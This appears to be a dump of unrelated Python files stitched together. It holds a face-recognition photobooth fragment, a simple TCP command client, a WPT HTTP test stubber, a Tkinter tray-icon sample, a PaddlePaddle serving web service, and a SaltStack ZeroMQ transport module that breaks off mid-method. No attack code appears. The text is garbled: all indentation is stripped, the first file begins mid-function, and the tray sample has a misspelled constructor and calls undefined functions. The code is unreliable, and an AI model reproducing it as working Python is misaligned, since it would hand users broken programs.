frame_copy = self.photobooth_app.frame.copy()
faces = self.detector(frame_copy)
x, y, w, h = 0, 0, 0, 0
if len(faces) > 0:
for face in faces:
try:
(x, y, w, h) = face_utils.rect_to_bb(face)
cv2.rectangle(frame_copy, (x, y), (x + w, y + h), (255, 255, 0), 2)
face_image = frame_copy[y:y + h, x:x + w].copy()
name, min_dist = self.recognize_face(face_image)
if min_dist < 0.15:
cv2.putText(frame_copy, "Face : " + name, (x, y - 50), cv2.FONT_HERSHEY_PLAIN, 1.5, (0, 255, 0), 2)
cv2.putText(frame_copy, "Dist : " + str(min_dist), (x, y - 20), cv2.FONT_HERSHEY_PLAIN, 1.5, (0, 255, 0), 2)
else:
cv2.putText(frame_copy, 'No matching faces', (x, y - 20), cv2.FONT_HERSHEY_PLAIN, 1.5, (0, 0, 255), 2)
except Exception as e:
print(e)
return frame_copy
def get_soloface_image(self):
frame_copy = self.photobooth_app.frame
faces = self.detector(frame_copy)
if len(faces) == 0:
self.alert_text.set("Aucun visage à l'horizon ! >o<")
self.alert_widget.config(fg="red")
return False
if len(faces) == 1:
try:
face = faces[0]
(x, y, w, h) = face_utils.rect_to_bb(face)
face_image = frame_copy[y:y + h, x:x + w]
except Exception as e:
print(e)
return face_image
if len(faces) > 1:
self.alert_text.set("Il y a plusieurs visages ! >o<")
self.alert_widget.config(fg="red")
return False
def recognize_face(self, face_descriptor):
encoding = fr_utils.img_to_encoding(face_descriptor, self.FRmodel)
min_dist = 100
identity = None
# Loop over the database dictionary's names and encodings.
for (name, db_enc) in self.database.items():
# Compute L2 distance between the target "encoding" and the current "emb" from the database.
dist = np.linalg.norm(db_enc - encoding)
print('distance for %s is %s' % (name, dist))
# If this distance is less than the min_dist, then set min_dist to dist, and identity to name
if dist < min_dist:
min_dist = dist
identity = name
return identity, min_dist
|
client.py
|
import socket
import threading
class Client:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
message = ""
server_address = 0
def welcome(self):
print("Welcome, please enter the address of the connection you want to reach")
try:
address = input("Address: ")
port = input("Port: ")
print("Connecting to "+address+":"+port+"...")
return (address, int(port))
except:
return ("0.0.0.0", 0)
def send_command(self):
while True:
self.message = input(">> ")
self.s.sendall(self.message.encode())
if self.message == "exit":
break
def __init__(self):
self.server_address = self.welcome()
def connect(self):
try:
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect(self.server_address)
except:
print("An error has ocurred")
thread = threading.Thread(target=self.send_command)
thread.daemon = True
thread.start()
while True:
server_message = self.s.recv(2048)
if not server_message:
break
print(server_message.decode())
if self.message == "exit":
print("Exiting...")
break
self.s.close()
client = Client()
client.connect()
|
http_stubber.py
|
# Copyright 2017 The WPT Dashboard Project. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import BaseHTTPServer
import json
import threading
import urllib2
class HTTPStubber(object):
'''An HTTP server which forwards errors raised during request handling to
the main thread.'''
class Handler(BaseHTTPServer.BaseHTTPRequestHandler):
def log_message(*argv):
pass
def do_GET(self):
return self.do()
def do_POST(self):
return self.do()
def do(self):
stubber = self.server.stubber
try:
stubber.on_request(self)
except Exception as e:
# In order to make test failure messages more intuitive,
# exceptions raised during command processing should be caught
# and reported to the main thread (where they can be
# subsequently re-raised).
stubber.exception = e
stubber._exception_lock.release()
def __init__(self, port=0):
self._server = BaseHTTPServer.HTTPServer(('', port), self.Handler)
self._server.stubber = self
self._exception_lock = threading.Lock()
self._exception_lock.acquire()
self.exception = None
def on_request(self, http_handler):
http_handler.send_response(200, 'OK')
http_handler.end_headers()
@property
def port(self):
return self._server.server_port
def stop(self):
self._server.shutdown()
def start(self):
'''Run the server and block until `stop` is invoked or until an
exception is raised during HTTP request handling.'''
def interrupt_on_exception(stubber):
exception = stubber._exception_lock.acquire()
stubber.stop()
threading.Thread(target=interrupt_on_exception, args=(self,)).start()
# The following call will block until the `stop` method is invoked,
# either explicitly by the user or as a result of an exception being
# raised during request handling.
self._server.serve_forever(0.1)
if self.exception:
raise self.exception
else:
# If no exception is present, the server was stopped via an
# external call to the `stop` method, and the thread dedicated to
# detecting exceptions is still waiting. Release the lock so that
# thread exits cleanly.
self._exception_lock.release()
|
sys_tray.py
|
#encoding:utf-8
''' Flash windows tray icon sample code '''
from Tkinter import Tk, Menu
import tkMessageBox
import os
import time
import threading
icon_state = False # Show icon0 when False, else show icon1
tray_root_menu = None
tray_menu = None
show_main_menu_callback = None
def flash_icon(root,icon):
global icon_state
print (root,icon)
while True:
root.tk.call('winico', 'taskbar', 'modify', icon,
'-pos', int(not icon_state), '-text', u'Flash Icon APP')
icon_state = not icon_state
time.sleep(0.5)
def menu_func(event, x, y):
if event == 'WM_RBUTTONDOWN': # Right click tray icon, pop up menu
tray_menu.tk_popup(x, y)
elif event == 'WM_LBUTTONDOWN' or event == 'WM_LBUTTONDBLCLK': # (double) click tray icon, pop up main menu
if show_main_menu_callback is not None:
show_main_menu_callback()
tray_root_menu.deiconify()
#else: #WM_LBUTTONDBLCLK
# print ('event:%s\n'%event)
def say_hello():
tkMessageBox.showinfo('msg', 'you clicked say hello button.')
class win_sys_tray():
def __int__(self):
self.__root = None
self.__sysTray = None
self.__trayIcons = None
self.__tips_title = None
def sys_tray_init(self,tips_title,root,icon_path,show_callback,ports_change_refresh,quit_callback=None):
global tray_menu
global show_main_menu_callback
show_main_menu_callback = show_callback
if root is None:
root = Tk()
self.__root = root
self.__tips_title = tips_title
if icon_path is None:
icon_path = os.path.join(os.getcwd(), 'earth.ico')
#print (root,icon_path)
root.tk.call('package', 'require', 'Winico')
self.__trayIcons = root.tk.call('winico', 'createfrom', icon_path) # New icon resources
tray_menu = Menu(root, tearoff=0)
tray_menu.add_command(label='Test Hello', command=say_hello)
if quit_callback is None:
tray_menu.add_command(label='Quit', command=root.quit)
else:
tray_menu.add_command(label='Quit', command=quit_callback)
#thread_param = (root,icon)
#t = threading.Thread(target=flash_icon,args=thread_param) # Create a new thread
#t.setDaemon(True)
#t.start()
#root.withdraw()
def sys_tray_stay(self):
self.__root.withdraw()
global tray_root_menu
tray_root_menu = self.__root
self.__root.tk.call('winico', 'taskbar', 'add', self.__trayIcons,
'-callback', (self.__root.register(menu_func), '%m', '%x', '%y'),
'-pos',0,
'-text',self.__tips_title)
def sys_tray_quit(self):
self.__root.tk.call('winico', 'taskbar', 'del', self.__trayIcons)
def sys_tray_leave(self):
self.__root.tk.call('winico', 'taskbar', 'del', self.__trayIcons)
self.__root.deiconify()
def sys_tray_loop(self):
self.__root.mainloop()
if __name__ == '__main__':
root,icon = sys_tray_init()
sys_tray_stay(root,icon,'tray demo',None)
time.sleep(5)
#sys_tray_leave(root,icon)
root.mainloop()
|
web_service.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!flask/bin/python
# pylint: disable=doc-string-missing
from flask import Flask, request, abort
from contextlib import closing
from multiprocessing import Pool, Process, Queue
from paddle_serving_client import Client
from deploy.paddle_serving_server_flask import OpMaker, OpSeqMaker, Server
from deploy.paddle_serving_server_flask.serve import start_multi_card
import socket
import sys
import numpy as np
import os
from deploy.paddle_serving_server_flask import pipeline
from deploy.paddle_serving_server_flask.pipeline import Op
def port_is_available(port):
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.settimeout(2)
result = sock.connect_ex(('0.0.0.0', port))
if result != 0:
return True
else:
return False
class WebService(object):
def __init__(self, name="default_service"):
self.name = name
# pipeline
self._server = pipeline.PipelineServer(self.name)
self.gpus = [] # deprecated
self.rpc_service_list = [] # deprecated
def get_pipeline_response(self, read_op):
return None
def prepare_pipeline_config(self, yaml_file):
# build dag
read_op = pipeline.RequestOp()
last_op = self.get_pipeline_response(read_op)
if not isinstance(last_op, Op):
raise ValueError("The return value type of `get_pipeline_response` "
"function is not Op type, please check function "
"`get_pipeline_response`.")
response_op = pipeline.ResponseOp(input_ops=[last_op])
self._server.set_response_op(response_op)
self._server.prepare_server(yaml_file)
def run_service(self):
self._server.run_server()
def load_model_config(self,
server_config_dir_paths,
client_config_path=None):
if isinstance(server_config_dir_paths, str):
server_config_dir_paths = [server_config_dir_paths]
elif isinstance(server_config_dir_paths, list):
pass
for single_model_config in server_config_dir_paths:
if os.path.isdir(single_model_config):
pass
elif os.path.isfile(single_model_config):
raise ValueError(
"The input of --model should be a dir not file.")
self.server_config_dir_paths = server_config_dir_paths
from .proto import general_model_config_pb2 as m_config
import google.protobuf.text_format
file_path_list = []
for single_model_config in self.server_config_dir_paths:
file_path_list.append("{}/serving_server_conf.prototxt".format(
single_model_config))
model_conf = m_config.GeneralModelConfig()
f = open(file_path_list[0], 'r')
model_conf = google.protobuf.text_format.Merge(
str(f.read()), model_conf)
self.feed_vars = {var.name: var for var in model_conf.feed_var}
if len(file_path_list) > 1:
model_conf = m_config.GeneralModelConfig()
f = open(file_path_list[-1], 'r')
model_conf = google.protobuf.text_format.Merge(
str(f.read()), model_conf)
self.fetch_vars = {var.name: var for var in model_conf.fetch_var}
if client_config_path == None:
self.client_config_path = file_path_list
def set_gpus(self, gpus):
print("This API will be deprecated later. Please do not use it")
self.gpus = [int(x) for x in gpus.split(",")]
def default_rpc_service(self,
workdir="conf",
port=9292,
gpuid=0,
thread_num=2,
mem_optim=True,
use_lite=False,
use_xpu=False,
ir_optim=False,
precision="fp32",
use_calib=False):
device = "gpu"
if gpuid == -1:
if use_lite:
device = "arm"
else:
device = "cpu"
op_maker = OpMaker()
op_seq_maker = OpSeqMaker()
read_op = op_maker.create('general_reader')
op_seq_maker.add_op(read_op)
for idx, single_model in enumerate(self.server_config_dir_paths):
infer_op_name = "general_infer"
if len(self.server_config_dir_paths) == 2 and idx == 0:
infer_op_name = "general_detection"
else:
infer_op_name = "general_infer"
general_infer_op = op_maker.create(infer_op_name)
op_seq_maker.add_op(general_infer_op)
general_response_op = op_maker.create('general_response')
op_seq_maker.add_op(general_response_op)
server = Server()
server.set_op_sequence(op_seq_maker.get_op_sequence())
server.set_num_threads(thread_num)
server.set_memory_optimize(mem_optim)
server.set_ir_optimize(ir_optim)
server.set_device(device)
server.set_precision(precision)
server.set_use_calib(use_calib)
if use_lite:
server.set_lite()
if use_xpu:
server.set_xpu()
server.load_model_config(self.server_config_dir_paths
) #brpc Server support server_config_dir_paths
if gpuid >= 0:
server.set_gpuid(gpuid)
server.prepare_server(workdir=workdir, port=port, device=device)
return server
def _launch_rpc_service(self, service_idx):
self.rpc_service_list[service_idx].run_server()
def create_rpc_config(self):
if len(self.gpus) == 0:
# init cpu service
self.rpc_service_list.append(
self.default_rpc_service(
self.workdir,
self.port_list[0],
-1,
thread_num=self.thread_num,
mem_optim=self.mem_optim,
use_lite=self.use_lite,
use_xpu=self.use_xpu,
ir_optim=self.ir_optim,
precision=self.precision,
use_calib=self.use_calib))
else:
for i, gpuid in enumerate(self.gpus):
self.rpc_service_list.append(
self.default_rpc_service(
"{}_{}".format(self.workdir, i),
self.port_list[i],
gpuid,
thread_num=self.thread_num,
mem_optim=self.mem_optim,
use_lite=self.use_lite,
use_xpu=self.use_xpu,
ir_optim=self.ir_optim,
precision=self.precision,
use_calib=self.use_calib))
def prepare_server(self,
workdir="",
port=9393,
device="gpu",
precision="fp32",
use_calib=False,
use_lite=False,
use_xpu=False,
ir_optim=False,
gpuid=0,
thread_num=2,
mem_optim=True):
print("This API will be deprecated later. Please do not use it")
self.workdir = workdir
self.port = port
self.thread_num = thread_num
self.device = device
self.precision = precision
self.use_calib = use_calib
self.use_lite = use_lite
self.use_xpu = use_xpu
self.ir_optim = ir_optim
self.mem_optim = mem_optim
self.gpuid = gpuid
self.port_list = []
default_port = 12000
for i in range(1000):
if port_is_available(default_port + i):
self.port_list.append(default_port + i)
if len(self.port_list) > len(self.gpus):
break
def _launch_web_service(self):
gpu_num = len(self.gpus)
self.client = Client()
self.client.load_client_config(self.client_config_path)
endpoints = ""
if gpu_num > 0:
for i in range(gpu_num):
endpoints += "127.0.0.1:{},".format(self.port_list[i])
else:
endpoints = "127.0.0.1:{}".format(self.port_list[0])
self.client.connect([endpoints])
def get_prediction(self, request):
if not request.json:
abort(400)
try:
feed, fetch, is_batch, dt_boxes = self.preprocess(request.json["feed"],
["save_infer_model/scale_0.tmp_1"])
if isinstance(feed, dict) and "fetch" in feed:
del feed["fetch"]
if len(feed) == 0:
raise ValueError("empty input")
fetch_map = self.client.predict(
feed=feed, fetch=fetch, batch=is_batch)
result = self.postprocess(
feed=request.json["feed"], fetch=fetch, fetch_map=fetch_map)
result = {"result": result}
except ValueError as err:
result = {"result": str(err)}
return result
def run_rpc_service(self):
print("This API will be deprecated later. Please do not use it")
import socket
localIP = socket.gethostbyname(socket.gethostname())
print("web service address:")
print("http://{}:{}/{}/prediction".format(localIP, self.port,
self.name))
server_pros = []
self.create_rpc_config()
for i, service in enumerate(self.rpc_service_list):
p = Process(target=self._launch_rpc_service, args=(i, ))
server_pros.append(p)
for p in server_pros:
p.start()
app_instance = Flask(__name__)
@app_instance.before_first_request
def init():
self._launch_web_service()
service_name = "/" + self.name + "/prediction"
@app_instance.route(service_name, methods=["POST"])
def run():
return self.get_prediction(request)
self.app_instance = app_instance
# TODO: maybe change another API name: maybe run_local_predictor?
def run_debugger_service(self, gpu=True):
print("This API will be deprecated later. Please do not use it")
import socket
localIP = socket.gethostbyname(socket.gethostname())
print("web service address:")
print("http://{}:{}/{}/prediction".format(localIP, self.port,
self.name))
app_instance = Flask(__name__)
@app_instance.before_first_request
def init():
self._launch_local_predictor(gpu)
service_name = "/" + self.name + "/prediction"
@app_instance.route(service_name, methods=["POST"])
def run():
return self.get_prediction(request)
self.app_instance = app_instance
def _launch_local_predictor(self, gpu):
# actually, LocalPredictor is like a server, but it is WebService Request initiator
# for WebService it is a Client.
# local_predictor only support single-Model DirPath - Type:str
# so the input must be self.server_config_dir_paths[0]
from paddle_serving_app.local_predict import LocalPredictor
self.client = LocalPredictor()
if gpu:
# if user forget to call function `set_gpus` to set self.gpus.
# default self.gpus = [0].
if len(self.gpus) == 0:
self.gpus.append(0)
self.client.load_model_config(
self.server_config_dir_paths[0],
use_gpu=True,
gpu_id=self.gpus[0])
else:
self.client.load_model_config(
self.server_config_dir_paths[0], use_gpu=False)
def run_web_service(self):
print("This API will be deprecated later. Please do not use it")
self.app_instance.run(host="0.0.0.0", port=self.port)
def get_app_instance(self):
return self.app_instance
def preprocess(self, feed=[], fetch=[]):
print("This API will be deprecated later. Please do not use it")
is_batch = True
feed_dict = {}
for var_name in self.feed_vars.keys():
feed_dict[var_name] = []
for feed_ins in feed:
for key in feed_ins:
feed_dict[key].append(
np.array(feed_ins[key]).reshape(
list(self.feed_vars[key].shape))[np.newaxis, :])
feed = {}
for key in feed_dict:
feed[key] = np.concatenate(feed_dict[key], axis=0)
return feed, fetch, is_batch,[]
def postprocess(self, feed=[], fetch=[], fetch_map=None):
print("This API will be deprecated later. Please do not use it")
for key in fetch_map:
fetch_map[key] = fetch_map[key].tolist()
return fetch_map
|
zeromq.py
|
# -*- coding: utf-8 -*-
'''
Zeromq transport classes
'''
# Import Python Libs
from __future__ import absolute_import
import os
import copy
import errno
import hashlib
import logging
import weakref
from random import randint
# Import Salt Libs
import salt.auth
import salt.crypt
import salt.utils
import salt.utils.verify
import salt.utils.event
import salt.payload
import salt.transport.client
import salt.transport.server
import salt.transport.mixins.auth
from salt.exceptions import SaltReqTimeoutError
import zmq
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
import zmq.eventloop.zmqstream
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# Import Tornado Libs
import tornado
import tornado.gen
import tornado.concurrent
# Import third party libs
import salt.ext.six as six
from Crypto.Cipher import PKCS1_OAEP
log = logging.getLogger(__name__)
class AsyncZeroMQReqChannel(salt.transport.client.ReqChannel):
'''
Encapsulate sending routines to ZeroMQ.
ZMQ Channels default to 'crypt=aes'
'''
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
def __new__(cls, opts, **kwargs):
'''
Only create one instance of channel per __key()
'''
# do we have any mapping for this io_loop
io_loop = kwargs.get('io_loop')
if io_loop is None:
zmq.eventloop.ioloop.install()
io_loop = tornado.ioloop.IOLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
if key not in loop_instance_map:
log.debug('Initializing new AsyncZeroMQReqChannel for {0}'.format(key))
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
new_obj = object.__new__(cls)
new_obj.__singleton_init__(opts, **kwargs)
loop_instance_map[key] = new_obj
else:
log.debug('Re-using AsyncZeroMQReqChannel for {0}'.format(key))
try:
return loop_instance_map[key]
except KeyError:
# In iterating over the loop_instance_map, we may have triggered
# garbage collection. Therefore, the key is no longer present in
# the map. Re-gen and add to map.
log.debug('Initializing new AsyncZeroMQReqChannel due to GC for {0}'.format(key))
new_obj = object.__new__(cls)
new_obj.__singleton_init__(opts, **kwargs)
loop_instance_map[key] = new_obj
return loop_instance_map[key]
def __deepcopy__(self, memo):
cls = self.__class__
result = cls.__new__(cls, copy.deepcopy(self.opts, memo)) # pylint: disable=too-many-function-args
memo[id(self)] = result
for key in self.__dict__:
if key in ('_io_loop',):
continue
# The _io_loop has a thread Lock which will fail to be deep
# copied. Skip it because it will just be recreated on the
# new copy.
if key == 'message_client':
# Recreate the message client because it will fail to be deep
# copied. The reason is the same as the io_loop skip above.
setattr(result, key,
AsyncReqMessageClient(result.opts,
self.master_uri,
io_loop=result._io_loop))
continue
setattr(result, key, copy.deepcopy(self.__dict__[key], memo))
return result
@classmethod
def __key(cls, opts, **kwargs):
return (opts['pki_dir'], # where the keys are stored
opts['id'], # minion ID
kwargs.get('master_uri', opts.get('master_uri')), # master ID
kwargs.get('crypt', 'aes'), # TODO: use the same channel for crypt
)
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.ttype = 'zeromq'
# crypt defaults to 'aes'
self.crypt = kwargs.get('crypt', 'aes')
if 'master_uri' in kwargs:
self.opts['master_uri'] = kwargs['master_uri']
self._io_loop = kwargs.get('io_loop')
if self._io_loop is None:
zmq.eventloop.ioloop.install()
self._io_loop = tornado.ioloop.IOLoop.current()
if self.crypt != 'clear':
# we don't need to worry about auth as a kwarg, since its a singleton
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self._io_loop)
self.message_client = AsyncReqMessageClient(self.opts,
self.master_uri,
io_loop=self._io_loop,
)
def __del__(self):
'''
Since the message_client creates sockets and assigns them to the IOLoop we have to
specifically destroy them, since we aren't the only ones with references to the FDs
'''
if hasattr(self, 'message_client'):
self.message_client.destroy()
else:
log.debug('No message_client attr for AsyncZeroMQReqChannel found. Not destroying sockets.')
@property
def master_uri(self):
return self.opts['master_uri']
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@tornado.gen.coroutine
def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
if not self.auth.authenticated:
# Return controle back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
# Return control to the caller. When send() completes, resume by populating ret with the Future.result
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
key = self.auth.get_keys()
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret['key'])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
raise tornado.gen.Return(pcrypt.loads(ret[dictkey]))
@tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60):
'''
Send a load across the wire, with encryption
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
:param dict load: A load to send across the wire
:param int tries: The number of times to make before failure
:param int timeout: The number of seconds on a response before failing
'''
@tornado.gen.coroutine
def _do_transfer():
# Yield control to the caller. When send() completes, resume by populating data with the Future.result
data = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
# we may not have always data
# as for example for saltcall ret submission, this is a blind
# communication, we do not subscribe to return events, we just
# upload the results to the master
if data:
data = self.auth.crypticle.loads(data)
raise tornado.gen.Return(data)
if not self.auth.authenticated:
# Return control back to the caller, resume when authentication succeeds
yield self.auth.authenticate()
try:
# We did not get data back the first time. Retry.
ret = yield _do_transfer()
except salt.crypt.AuthenticationError:
# If auth error, return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
'''
Send a load across the wire in cleartext
:param dict load: A load to send across the wire
:param int tries: The number of times to make before failure
:param int timeout: The number of seconds on a response before failing
'''
ret = yield self.message_client.send(
self._package_load(load),
timeout=timeout,
tries=tries,
)
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def send(self, load, tries=3, timeout=60):
'''
Send a request, return a future which will complete when we send the message
'''
if self.crypt == 'clear':
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout)
raise tornado.gen.Return(ret)
class AsyncZeroMQPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel):
'''
A transport channel backed by ZeroMQ for a Salt Publisher to use to
publish commands to connected minions
'''
def __init__(self,
opts,
**kwargs):
self.opts = opts
self.ttype = 'zeromq'
self.io_loop = kwargs.get('io_loop')
if self.io_loop is None:
zmq.eventloop.ioloop.install()
self.io_loop = tornado.ioloop.IOLoop.current()
self.hexid = hashlib.sha1(six.b(self.opts['id'])).hexdigest()
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
self._socket = self.context.socket(zmq.SUB)
if self.opts['zmq_filtering']:
# TODO: constants file for "broadcast"
self._socket.setsockopt(zmq.SUBSCRIBE, 'broadcast')
self._socket.setsockopt(zmq.SUBSCRIBE, self.hexid)
else:
self._socket.setsockopt(zmq.SUBSCRIBE, '')
self._socket.setsockopt(zmq.IDENTITY, self.opts['id'])
# TODO: cleanup all the socket opts stuff
if hasattr(zmq, 'TCP_KEEPALIVE'):
self._socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
recon_delay = self.opts['recon_default']
if self.opts['recon_randomize']:
recon_delay = randint(self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max']
)
log.debug("Generated random reconnect delay between '{0}ms' and '{1}ms' ({2})".format(
self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'],
recon_delay)
)
log.debug("Setting zmq_reconnect_ivl to '{0}ms'".format(recon_delay))
self._socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
log.debug("Setting zmq_reconnect_ivl_max to '{0}ms'".format(
self.opts['recon_default'] + self.opts['recon_max'])
)
self._socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self._socket.setsockopt(zmq.IPV4ONLY, 0)
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
self._monitor = ZeroMQSocketMonitor(self._socket)
self._monitor.start_io_loop(self.io_loop)
def destroy(self):
if hasattr(self, '_monitor') and self._monitor is not None:
self._monitor.stop()
self._monitor = None
if hasattr(self, '_stream'):
# TODO: Optionally call stream.close() on newer pyzmq? Its broken on some
self._stream.io_loop.remove_handler(self._stream.socket)
self._stream.socket.close(0)
elif hasattr(self, '_socket'):
self._socket.close(0)
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
def __del__(self):
self.destroy()
# TODO: this is the time to see if we are connected, maybe use the req channel to guess?
@tornado.gen.coroutine
def connect(self):
if not self.auth.authenticated:
yield self.auth.authenticate()
self.publish_port = self.auth.creds['publish_port']
self._socket.connect(self.master_pub)
@property
def master_pub(self):
'''
Return the master publish port
'''
return 'tcp://{ip}:{port}'.format(ip=self.opts['master_ip'],
port=self.publish_port)
@tornado.gen.coroutine
def _decode_messages(self, messages):
'''
Take the zmq messages, decrypt/decode them into a payload
:param list messages: A list of messages to be decoded
'''
messages_len = len(messages)
# if it was one message, then its old style
if messages_len == 1:
payload = self.serial.loads(messages[0])
# 2 includes a header which says who should do it
elif messages_len == 2:
if messages[0] not in ('broadcast', self.hexid):
log.debug('Publish received for not this minion: {0}'.format(messages[0]))
raise tornado.gen.Return(None)
payload = self.serial.loads(messages[1])
else:
raise Exception(('Invalid number of messages ({0}) in zeromq pub'
'message from master').format(len(messages_len)))
# Yield control back to the caller. When the payload has been decoded, assign
# the decoded payload to 'ret' and resume operation
ret = yield self._decode_payload(payload)
raise tornado.gen.Return(ret)
@property
def stream(self):
'''
Return the current zmqstream, creating one if necessary
'''
if not hasattr(self, '_stream'):
self._stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
return self._stream
def on_recv(self, callback):
'''
Register a callback for received messages (that we didn't initiate)
:param func callback: A function which should be called when data is received
'''
if callback is None:
return self.stream.on_recv(None)
@tornado.gen.coroutine
def wrap_callback(messages):
payload = yield self._decode_messages(messages)
if payload is not None:
callback(payload)
return self.stream.on_recv(wrap_callback)
class ZeroMQReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel):
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._closing = False
def zmq_device(self):
'''
Multiprocessing target for the zmq queue device
'''
salt.utils.appendproctitle('MWorkerQueue')
self.context = zmq.Context(self.opts['worker_threads'])
# Prepare the zeromq sockets
self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts)
self.clients = self.context.socket(zmq.ROUTER)
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.clients.setsockopt(zmq.IPV4ONLY, 0)
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
# Socket monitor shall be used the only for debug purposes so using threading doesn't look too bad here
import threading
self._monitor = ZeroMQSocketMonitor(self.clients)
t = threading.Thread(target=self._monitor.start_poll)
t.start()
self.workers = self.context.socket(zmq.DEALER)
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Setting up the master communication server')
self.clients.bind(self.uri)
self.workers.bind(self.w_uri)
while True:
if self.clients.closed or self.workers.closed:
break
try:
zmq.device(zmq.QUEUE, self.clients, self.workers)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
except (KeyboardInterrupt, SystemExit):
break
def close(self):
'''
Cleanly shutdown the router socket
'''
if self._closing:
return
self._closing = True
if hasattr(self, '_monitor') and self._monitor is not None:
self._monitor.stop()
self._monitor = None
if hasattr(self, 'clients') and self.clients.closed is False:
self.clients.close()
if hasattr(self, 'workers') and self.workers.closed is False:
self.workers.close()
if hasattr(self, 'stream'):
self.stream.close()
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
def pre_fork(self, process_manager):
'''
Pre-fork we need to create the zmq router device
:param func process_manager: An instance of salt.utils.process.ProcessManager
'''
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
process_manager.add_process(self.zmq_device)
def post_fork(self, payload_handler, io_loop):
'''
After forking we need to create all of the local sockets to listen to the
router
:param func payload_handler: A function to called to handle incoming payloads as
they are picked up off the wire
:param IOLoop io_loop: An instance of a Tornado IOLoop, to handle event scheduling
'''
self.payload_handler = payload_handler
self.io_loop = io_loop
self.context = zmq.Context(1)
self._socket = self.context.socket(zmq.REP)
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Worker binding to socket {0}'.format(self.w_uri))
self._socket.connect(self.w_uri)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
self.stream.on_recv_stream(self.handle_message)
@tornado.gen.coroutine
def handle_message(self, stream, payload):
'''
